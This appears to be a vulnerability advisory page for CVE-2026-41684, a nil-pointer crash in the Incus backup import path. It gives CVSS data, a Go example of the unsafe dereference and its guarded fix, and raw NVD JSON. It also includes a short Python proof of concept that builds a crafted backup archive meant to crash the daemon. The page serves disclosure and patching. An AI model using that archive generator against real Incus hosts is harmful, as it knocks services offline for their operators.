Security Vulnerability Report
CVE-2026-41684 CVSS 6.5 MEDIUM

Published: 2026-05-07 14:16:03
Last Modified: 2026-05-07 19:51:01

Description

Incus is a system container and virtual machine manager. Prior to version 7.0.0, backup.GetInfo() trusts the inline backup/index.yaml config when present and only falls back to parsing the legacy backup/container/backup.yaml file if result.Config == nil. As a result, an archive can carry a valid inline config that passes the initial import preflight while also carrying a malformed legacy backup/container/backup.yaml file that is reparsed later from the restored file system. ParseConfigYamlFile() accepts YAML documents with no container section, and multiple downstream consumers then dereference .Container without checking for nil. Confirmed examples in the instance restore and import flow include backup.UpdateInstanceConfig() and internalImportFromBackup(). An authenticated user with permission to import instance backups may be able to crash the Incus daemon with a crafted backup archive whose inline backup/index.yaml is valid but whose extracted legacy backup.yaml omits container. The crash occurs in the restore path after archive extraction has begun. This issue has been patched in version 7.0.0.
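The nil-dereference pattern described above, next to the guarded form, as an added example that is not Incus code. The types and function names are hypothetical, and JSON stands in for YAML so the block needs only the standard library; outside this example nothing recovers the panic, so the unguarded form ends the process.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
)

// Hypothetical stand-ins for the backup config types (not Incus code).
type Instance struct{ Name string `json:"name"` }
type Config struct{ Container *Instance `json:"container"` }

var ErrNoContainer = errors.New("backup config has no container section")

// parseConfig is a lenient parser: a document without "container" decodes
// cleanly and leaves Container nil. JSON stands in for YAML (stdlib only).
func parseConfig(doc []byte) (*Config, error) {
	var c Config
	if err := json.Unmarshal(doc, &c); err != nil {
		return nil, err
	}
	return &c, nil
}

// unsafeName dereferences Container unconditionally (CWE-476 pattern).
// recover() converts the panic to an error so the example can report it.
func unsafeName(c *Config) (name string, err error) {
	defer func() {
		if r := recover(); r != nil {
			err = fmt.Errorf("panic: %v", r)
		}
	}()
	return c.Container.Name, nil
}

// safeName checks for nil and returns an error instead of panicking.
func safeName(c *Config) (string, error) {
	if c == nil || c.Container == nil {
		return "", ErrNoContainer
	}
	return c.Container.Name, nil
}

func main() {
	legacy, _ := parseConfig([]byte(`{"pool":"default"}`)) // constructed sample
	_, err := unsafeName(legacy)
	fmt.Println("unsafe:", err)
	_, err = safeName(legacy)
	fmt.Println("safe:  ", err)
}
```

The guard belongs at every point where the file is parsed again, because a check on the inline index says nothing about the legacy file read later from disk.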

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:linuxcontainers:incus:*:*:*:*:*:*:*:* - VULNERABLE
Incus < 7.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# This is a conceptual PoC to generate a malicious backup archive structure.
# It creates a tarball with a valid index.yaml but a malformed legacy backup.yaml.
import tarfile
import io
import yaml

# 1. Create a valid inline index.yaml
index_data = {
    'config': {},
    'container': None,  # Valid struct for inline
    'pool': 'default'
}
index_yaml = yaml.dump(index_data)

# 2. Create a malformed legacy backup.yaml (missing container section)
# This simulates the payload that triggers the nil pointer dereference
legacy_data = {
    'config': {},
    # 'container' key is intentionally missing or malformed
}
legacy_yaml = yaml.dump(legacy_data)

# 3. Build the tar archive
with tarfile.open("malicious_backup.tar.gz", "w:gz") as tar:
    # Add valid inline config
    index_bytes = index_yaml.encode('utf-8')
    index_info = tarfile.TarInfo(name='backup/index.yaml')
    index_info.size = len(index_bytes)
    tar.addfile(index_info, io.BytesIO(index_bytes))

    # Add malformed legacy config
    legacy_bytes = legacy_yaml.encode('utf-8')
    legacy_info = tarfile.TarInfo(name='backup/container/backup.yaml')
    legacy_info.size = len(legacy_bytes)
    tar.addfile(legacy_info, io.BytesIO(legacy_bytes))

print("Malicious backup archive generated: malicious_backup.tar.gz")
# An attacker would upload this file via the Incus API import endpoint.
```

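References

https://github.com/lxc/incus/releases/tag/v7.0.0 (Patch, Product)
https://github.com/lxc/incus/security/advisories/GHSA-x5r6-jr56-89pv (Exploit, Mitigation, Vendor Advisory)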

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-41684", "sourceIdentifier": "[email protected]", "published": "2026-05-07T14:16:03.350", "lastModified": "2026-05-07T19:51:01.190", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incus is a system container and virtual machine manager. Prior to version 7.0.0, backup.GetInfo() trusts the inline backup/index.yaml config when present and only falls back to parsing the legacy backup/container/backup.yaml file if result.Config == nil. As a result, an archive can carry a valid inline config that passes the initial import preflight while also carrying a malformed legacy backup/container/backup.yaml file that is reparsed later from the restored file system. ParseConfigYamlFile() accepts YAML documents with no container section, and multiple downstream consumers then dereference. Container without checking for nil. Confirmed examples in the instance restore and import flow include backup.UpdateInstanceConfig() and internalImportFromBackup(). An authenticated user with permission to import instance backups may be able to crash the Incus daemon with a crafted backup archive whose inline backup/index.yaml is valid but whose extracted legacy backup.yaml omits container. The crash occurs in the restore path after archive extraction has begun. This issue has been patched in version 7.0.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxcontainers:incus:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.0.0", "matchCriteriaId": "CF8EBB4B-C1F0-44C5-B063-9CF8EB6E0972"}]}]}], "references": [{"url": "https://github.com/lxc/incus/releases/tag/v7.0.0", "source": "[email protected]", "tags": ["Patch", "Product"]}, {"url": "https://github.com/lxc/incus/security/advisories/GHSA-x5r6-jr56-89pv", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}
```